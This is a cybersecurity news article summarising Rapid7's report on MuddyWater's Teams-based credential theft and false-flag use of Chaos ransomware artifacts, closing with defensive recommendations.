MuddyWater used Teams to steal credentials in false-flag attack
Iran-linked MuddyWater used Microsoft Teams screen sharing to harvest credentials, bypass multi-factor authentication and pose as Chaos ransomware while exfiltrating data, Rapid7 reported.
Rapid7 reported that an Iran-linked hacking group known as MuddyWater used Microsoft Teams screen-sharing to collect employee credentials, bypass multi-factor authentication and carry out a false-flag operation that mimicked Chaos ransomware. The activity was observed in early 2026 and focused on data theft and long-term access rather than mass file encryption.
Investigators found attackers initiated external chat requests through Teams and asked employees to start interactive screen-sharing sessions. During those sessions victims typed account credentials into locally created text files and, in some instances, entered MFA codes into files at the attackers’ direction. The intruders then installed remote management tools, including AnyDesk and DWAgent, to maintain access, perform reconnaissance and move laterally within the network.
The intrusion began with an executable labeled ms_upd.exe that was downloaded over RDP with the curl utility from an external server. That dropper retrieved additional files: a remote access trojan identified as game.exe or Darkcomp that impersonates a Microsoft WebView2 application, a legitimate WebView2Loader.dll, and an encrypted configuration file. The RAT contacted a command-and-control server, polled for commands on a regular interval, could run PowerShell or spawn interactive shells, and performed file operations to support ongoing remote control and data collection.
Rapid7 linked the activity to MuddyWater through reuse of a code-signing certificate registered to “Donald Gay,” a certificate previously used to sign other malicious tools attributed to the cluster. The investigators also noted the group’s use of widely available cybercrime tools such as CastleRAT and Tsundere in recent operations, and its past involvement in incidents that used loaders like PowGoop and ransomware families including Thanos and Qilin.
Chaos is a ransomware-as-a-service brand that surfaced in 2025 and offers affiliates options such as DDoS threats and pressure campaigns against customers or competitors. Rapid7 observed Chaos artifacts in the intrusion, but found no evidence of widespread file encryption. Rapid7 wrote, “The apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a deviation from typical ransomware behavior. This inconsistency may indicate that the ransomware component functioned primarily as a facilitating or obfuscation mechanism, rather than as the primary objective of the intrusion.”
Other security firms reported related Iran-aligned activity in the region, including an operation that exposed more than 26,000 records from a government ministry and claims by pro-Iran hacktivist groups of multiple data leaks. Sergey Shykevich, group manager at Check Point Research, warned, “The cyber and kinetic domains are now explicitly connected,” and described a rise in attacks that combine data theft and other objectives.
Rapid7 recommended that security teams scrutinize external collaboration requests in Teams, strengthen MFA controls to resist social manipulation and monitor for persistent remote-management software such as AnyDesk and DWAgent. The report emphasized that attackers used social engineering via collaboration tools to gain initial access and then focused on maintaining covert access and extracting sensitive files rather than launching a large-scale encryption campaign.
